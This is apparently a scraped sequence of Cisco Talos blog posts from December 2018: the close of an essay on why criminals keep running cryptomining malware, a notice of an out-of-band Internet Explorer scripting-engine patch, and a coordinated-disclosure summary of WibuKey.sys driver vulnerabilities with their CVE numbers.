Those groups that focus on active exploitation and brute forcing are all in on mining, and it will take some additional force to move them off of this payload, mainly because of the resources they've already committed. It takes time and effort to shift away from things like distributed denial-of-service and spam botnets to cryptomining. Many of these adversaries took the time and effort to shift away and focus on mining. A decrease in the value of the currency isn't going to move them off of that.

Additionally, it's a question of risk and opportunity. Conducting a campaign of malicious cryptocurrency mining is far less likely to draw the attention of a security team or law enforcement when compared to some of the noisier threats like ransomware that requires command and control, victim interaction and continued communications. Malicious mining, on the other hand, allows for somewhat stable revenue generation, despite being a potentially limited earning potential per system. Money is money, and if you are operating at scale and stealing all the resources, it's primarily profit.

Conclusion

Malicious cryptocurrency mining is a massive part of the threat landscape in 2018 and appears poised to remain a significant player in 2019 and beyond. Despite the recent catastrophic price collapse of these currencies, it is still profitable in many circumstances. That does not mean that the collapse has had no impact —we've seen that it has had an impact on the volume of spam.

The data shows that this activity has been steady for the past six months and although there is a potential for a significant shift in the next six months, at least so far, it isn't in the data. Time will be the true wildcard in how mining lives on. Given time, adversaries may find a more attractive target, but right now, there are not many options that generate reliable income, with minimal risk, and don't require remote access of compromised systems. This is probably the biggest reason why mining isn't going anywhere:It's profitable. And because it's easy, anyone looking to make money will be drawn to it.

The real question is: What's next? What are the threats that enterprises should be preparing for today? Modular, flexible malware is likely the path forward as the avenues for monetization continues to change and evolve. Adversaries that are driven by monetary gain stand to generate the most revenue if they profile the end system, much like downloaders can and do today. If you compromise a gaming system or a high-end server a threat like a miner might be ideal. However, if you compromise a high-end laptop located in the U.S., you may decide ransomware is the best avenue, or if it's part of a corporate domain, just monetizing the access might be preferred. Or when compromising an average computer in a developing country, a simple bot might be best to provide a foothold to propagate an actor's malicious intentions or attack other systems and computers with an added layer of anonymity.

Regardless, it's clear why adversaries desire this type of flexibility. As systems get faster and the ways that a compromised system can be monetized continue to grow, modular malware will rise in popularity.

↧

Microsoft Patches Out-of-Band Internet Explorer Scripting Engine Vulnerability After Exploitation Detected in the Wild

December 19, 2018, 4:19 pm

≫ Next: Vulnerability Spotlight : Multiple Vulnerabilities in WIBU-SYSTEMS WibuKey.sys

≪ Previous: As Cryptocurrency Crash Continues, Will Mining Threat Follow?

Overview

On December 19th, 2019 Microsoft released an out-of-band (OOB) patch related to a vulnerability in the scripting engine of Internet Explorer. This particular vulnerability is believed to be actively exploited in the wild and should be patched immediately.

This remote code execution bug lies in the way that Internet Explorer's scripting engine handles objects in memory. Triggering this vulnerability can corrupt memory in such a way to allow arbitrary code execution using the current users rights. This vulnerability can be triggered in a variety of ways including via a specially crafted web-page that a user visits and is compromised. The full details of the vulnerability can be found here.

Coverage

↧

Vulnerability Spotlight : Multiple Vulnerabilities in WIBU-SYSTEMS WibuKey.sys

December 20, 2018, 9:48 am

≫ Next: Year in Malware 2018: The most prominent threats Talos tracked this year

≪ Previous: Microsoft Patches Out-of-Band Internet Explorer Scripting Engine Vulnerability After Exploitation Detected in the Wild

These vulnerabilities were discovered by Marcin 'Icewall' Noga of Cisco Talos.

Executive Summary

WibuKey is a Digital Rights Management (DRM) solution that has been used in a large number of solutions such as Straton, Archicad, GRAPHISOFT, V-Ray and others. It has been leveraged by over 3,000 companies around the world to protect intellectual property and other digital content. Cisco Talos recently discovered multiple vulnerabilities in WibuKey that could be leveraged by an attacker to disclose potentially sensitive information, perform privilege escalation, or obtain arbitrary code execution on affected systems.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Wibu Systems to ensure that these issues are resolved and that a software update is available for affected customers. It is recommended that this update be applied as quickly as possible to ensure that systems are no longer affected by these vulnerabilities.

Vulnerability details

WIBU-SYSTEMS WibuKey.sys 0x8200E804 Kernel Memory Information Disclosure Vulnerability (TALOS-2018-0657 / CVE-2018-3989)

An exploitable kernel memory disclosure vulnerability exists in the 0x8200E804 IOCTL handler functionality of WIBU-SYSTEMS WibuKey.sys Version 6.40 (Build 2400). A specially crafted IRP request can cause the driver to return uninitialized memory, resulting in kernel memory disclosure. For additional details, please see the advisory here.

WIBU-SYSTEMS WibuKey.sys 0x8200E804 Pool Corruption Privilege Escalation Vulnerability (TALOS-2018-0658 / CVE-2018-3990)

An exploitable pool corruption vulnerability exists in the 0x8200E804 IOCTL handler functionality of WIBU-SYSTEMS WibuKey.sys Version 6.40 (Build 2400). A specially crafted IRP request can cause a buffer overflow, resulting in kernel memory corruption. For additional details, please see the advisory here.

WIBU-SYSTEMS WibuKey Network Server Management WkbProgramLow Remote Code Execution Vulnerability (TALOS-2018-0659 / CVE-2018-3991)

An especially critical exploitable heap overflow vulnerability exists in the WkbProgramLow function of WibuKey Network server management. A specially crafted TCP package can cause heap overflow and allow for remote kernel level code execution. For additional details, please see the advisory here.

Versions tested

WIBU-SYSTEMS WibuKey Network server management 6.40.2402.500

Coverage

↧